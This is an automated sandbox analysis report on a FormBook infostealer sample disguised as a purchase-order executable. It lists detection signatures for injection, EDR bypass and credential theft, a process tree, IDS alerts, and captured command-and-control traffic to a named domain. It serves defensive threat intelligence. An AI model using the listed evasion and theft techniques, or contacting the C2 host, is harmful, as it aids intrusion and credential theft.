Edit tour

Windows Analysis Report
Details Of Our PO..exe

Overview

General Information

Sample name:	Details Of Our PO..exe
Analysis ID:	1665094
MD5:	de3b837022c60759a0bbc49a1b37f87b
SHA1:	7392485b619806eaeef1b1bd2c1420452ad56d51
SHA256:	3ef9e32717d21cbe668ad80d638e035431fde3d2807fa265f8c4b24451acfd22
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Details Of Our PO..exe (PID: 4796 cmdline: "C:\Users\user\Desktop\Details Of Our PO..exe" MD5: DE3B837022C60759A0BBC49A1B37F87B)

Details Of Our PO..exe (PID: 4856 cmdline: "C:\Users\user\Desktop\Details Of Our PO..exe" MD5: DE3B837022C60759A0BBC49A1B37F87B)

kgiwhJAWTiJvkoTzfbZTr.exe (PID: 6152 cmdline: "C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\fdA2mlnPmU.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

ktmutil.exe (PID: 5504 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)

kgiwhJAWTiJvkoTzfbZTr.exe (PID: 4284 cmdline: "C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\e7uiCZM2.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 7624 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.3639234599.0000000000B00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3641351972.00000000053B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3636731674.0000000000500000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1306921757.0000000001290000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1304498095.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3638939405.00000000009B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3639012811.0000000003090000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1307125156.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: Details Of Our PO..exe PID: 4796	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.Details Of Our PO..exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.Details Of Our PO..exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Suricata Signatures

ETPRO EXPLOIT_KIT FoxTDS Initial Check

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-15T08:54:16.981457+0200	2859622	1	Exploit Kit Activity Detected	104.21.80.1	80	192.168.2.4	49749	TCP
2025-04-15T08:54:19.624896+0200	2859622	1	Exploit Kit Activity Detected	104.21.80.1	80	192.168.2.4	49750	TCP
2025-04-15T08:54:22.265814+0200	2859622	1	Exploit Kit Activity Detected	104.21.80.1	80	192.168.2.4	49751	TCP
2025-04-15T08:54:25.015069+0200	2859622	1	Exploit Kit Activity Detected	104.21.80.1	80	192.168.2.4	49752	TCP

HTTP traffic detected: POST /el9f/ HTTP/1.1Host: www.restrainreflection.xyzAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 199Connection: closeOrigin: http://www.restrainreflection.xyzReferer: http://www.restrainreflection.xyz/el9f/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)Data Raw: 42 7a 3d 74 44 37 44 4b 48 6a 30 78 6d 54 70 39 71 30 51 78 61 66 48 42 49 43 78 32 67 76 6e 66 54 7a 42 4f 56 77 64 79 41 73 79 73 38 50 36 54 50 35 4c 6e 6b 71 68 44 48 38 4c 70 6c 59 37 78 75 45 6c 46 72 69 56 5a 2f 59 67 62 45 38 41 67 70 74 62 79 2b 2f 34 6f 68 45 6b 56 31 33 33 58 54 79 69 74 73 72 32 72 33 38 46 4b 41 66 64 6f 5a 47 61 4b 2f 69 5a 51 6e 6c 59 59 44 47 74 6e 55 4c 73 56 44 5a 45 62 50 35 67 6d 6d 74 32 6c 76 47 73 69 52 61 4f 44 43 52 46 70 43 6d 32 6d 61 37 67 6d 36 66 48 57 38 38 32 4f 76 4d 57 48 6b 58 6e 75 41 59 34 58 6b 7a 67 55 72 31 6b 46 66 57 33 32 51 3d 3d Data Ascii: Bz=tD7DKHj0xmTp9q0QxafHBICx2gvnfTzBOVwdyAsys8P6TP5LnkqhDH8LplY7xuElFriVZ/YgbE8Agptby+/4ohEkV133XTyitsr2r38FKAfdoZGaK/iZQnlYYDGtnULsVDZEbP5gmmt2lvGsiRaODCRFpCm2ma7gm6fHW882OvMWHkXnuAY4XkzgUr1kFfW32Q==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:53:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:53:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:53:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:53:58 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:54:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:54:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:54:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:54:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:55:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nLK3i0u%2BNgOxUSqDis6IIBSUTb0VgnU8jT4B2PJzyuVPdGHbnO%2F5GqO92VuYBFwoBE3bP9ixd0EAzt3AiU4vVA5mOZXpwJ6nBERJnVRUIkMlKy3NspNWmLqH%2FwYdcLiHA0Ip"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9309892eab50afae-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106205&min_rtt=106205&rtt_var=53102&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 9b a5 d0 85 78 23 67 1d 7a d8 8e 69 b9 bb 72 07 a5 b7 d0 85 a3 1f 65 6b 1c 0d 2b 4b 3a 69 e2 24 57 fa df 0f 39 c9 be b4 12 c8 92 fc cc a3 99 67 46 aa af 7e ff fb b7 87 af f7 7f 80 e6 c1 34 b3 3a 7d 20 f2 d1 e0 66 ae 91 b6 9a cb 5c 88 37 f3 f4 0b a5 6a 66 f5 80 2c c1 ca 01 37 f3 91 70 ef 5d e0 39 74 ce 32 5a de cc f7 a4 58 6f 14 8e d4 61 36 2d 16 40 96 98 a4 c9 62 27 0d 6e f2 05 44 1d c8 3e 66 ec b2 9e 78 63 5d 62 67 62 83 0d 14 a2 80 cf 8e e1 a3 db 59 f5 cb ac 5e 9e f6 eb c9 a5 e6 fd 80 8a 24 bc f5 01 7b 0c 31 eb 9c 71 21 8b 9d c6 01 4b 25 c3 e3 cd b7 d6 a9 e3 b7 56 76 8f db 90 28 4e 90 f2 5a 08 71 45 43 72 56 5a fe fe bd 5e 9e 08 eb e5 39 aa 64 76 89 fb 64 02 d7 45 51 54 30 c8 b0 25 5b 8a aa 77 96 4b b0 2e 0c d2 40 5e f8 c3 72 25 fc 01 3e 04 92 66 01 7f a2 19 91 a9 93 0b 88 d2 c6 2c 62 a0 be 82 17 12 56 f0 93 57 70 dd f7 7d 95 a2 57 34 fe a0 ba dc b1 ab 60 20 9b bd e2 98 37 90 da 4b 03 c6 03 67 d2 d0 d6 96 d0 a1 65 0c 15 4c ca 97 bf 0a e1 0f 97 10 32 83 3d 97 90 15 a7 4d ef 22 31 39 5b ca 36 3a b3 63 ac 80 9d 2f e1 2e 9d 32 41 d7 e2 4d f2 0d ce ad d6 f9 e5 c4 27 4d 20 89 92 45 fa 0f cb 7c 3d d1 1a b2 f8 e4 f1 69 6b c2 ec 4f 5b ad 33 aa 9a 37 85 28 ea a5 ce 53 51 ad 5e 93 66 c9 89 24 6c f5 4c 0d 77 69 3d 6f 5e d5 85 5e 35 b3 da 37 0f 1a 21 60 74 bb d0 a5 c9 bf 3b 8c 8c 0a 3a b7 33 0a ac 63 68 11 fa 64 03 ce 02 6b 8a 10 31 8c Data Ascii: 2cbdTm80x#gzirek+K:i$W9gF~4:} f\7jf,7p]9t2ZXoa6-@b'nD>fxc]bgbY^${1q!K%Vv(NZqECrVZ^9dvdEQT0%[wK.@^r%>f,bVWp}W4` 7KgeL2=M"19[6:c/.2AM'M E\|=ikO[37(SQ^f$lLwi=o^^57!`t;:3chdk1
